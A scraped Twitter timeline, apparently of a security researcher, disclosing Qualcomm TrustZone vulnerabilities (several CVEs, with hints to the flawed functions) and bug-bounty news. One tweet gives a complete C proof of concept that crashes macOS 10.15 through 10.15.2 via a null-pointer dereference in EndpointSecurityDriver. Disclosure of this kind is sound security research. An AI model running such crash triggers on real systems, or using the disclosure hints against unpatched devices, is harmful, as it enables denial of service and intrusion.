Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @H4UL4
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @H4UL4
-
Arash Tohidi proslijedio/la je Tweet
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ 99%
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
A very dumb null-ptr dereference in MacOS 10.15 -> 10.15.2https://twitter.com/H4UL4/status/1210572307330150401 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#include <IOKit/IOKitLib.h> int main(void) { CFMutableDictionaryRef d = IOServiceMatching("EndpointSecurityDriver"); io_service_t srv = IOServiceGetMatchingService(kIOMasterPortDefault, d); io_connect_t con; IOServiceOpen(srv, mach_task_self(), 0x41, &con); return 0; }Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Arash Tohidi proslijedio/la je Tweet
Science fact of the day: nobody has ever learned C++.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Arash Tohidi proslijedio/la je Tweet
You can kiss yourself in the mirror, but only on the lips.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Arash Tohidi proslijedio/la je Tweet
I guess this is what advisories are going to look like in 2020?https://twitter.com/josephfcox/status/1207101031223627781 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Continuing the chain of disclosures, CVE-2019-14043 Controlled OOB RW present in Qualcomm Fingerprint TA due to insufficient memory input handling. Follow the cmd handler and take a look at QFP_ExecCalibAndTest(). The OOB read was rated as Medium and the OOB write as High.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Disclosing CVE-2019-14042: Multiple OOB Reads in Qualcomm Fingerprint TA. I found these in SDM845 & reported them to QPSI 5 months ago. Still unpatched.Their security impact rated as MEDIUM by QPSI. Follow the TA's cmd handling routine and take a look at exec_open_framework().
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Just got an email from
@GoogleVRP about a reward for a bug I reported a year ago!#ChristmasInNovemberHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
These bugs are rated as HIGH impact by Qualcomm Product Security.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
If you're interested to see the bugs yourself, the bugs are in the command handling function which accepts command and response buffers but fails to validate them correctly.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Disclosing CVE-2019-14009: Multiple Memory Corruptions in QPAY TrustZone application found in SDM845. Found and reported to QPSI 6 months ago. Patches have been sent to OEMs by Qualcomm but not yet released.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Haven't had time to work more on Apple products recently, but here's a new one... https://support.apple.com/en-us/HT210722 pic.twitter.com/cbyyI50ODJ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
There are usually 2 things politicians use as arguments against things they don't like: 1. Patriotism, nationalism or what we can call "hiding behind the flag" 2. Inapplicable, irrelevant morality concerns & cherry picking Subject being cannabis, immigration, war, minorities...
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
There are also couple of new TZ bugs (1 duplicate High impact and 2 Medium impact survivors) which hopefully will be addressed in 3 months. These are completely different bugs than the ones I reported to Google 2 months ago. Details of all will come after the fixes.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Just got the second 5k bounty from QC for a baseband bug which survived the bounty policies and the chance of being a duplicate. Although have been quite overwhelmed with work recently. Have to take a small break soon.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Arash Tohidi proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Finally one of the vendors accepted responsibility of fixing and pushing the updates. Will keep you updated upon release.https://twitter.com/H4UL4/status/1156272070906580992 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I have to skip this option because of some NDA's that I have signed. I will push more to force the vendors to fix and release an update.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I have found a number of vulns in a widely used product which I have tried to report to the vendor. But there is no communication line with this vendor for fixing vulns. The OEMs who use this product just refer me to another OEM. Hence, we might have to go public. Stay tuned.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.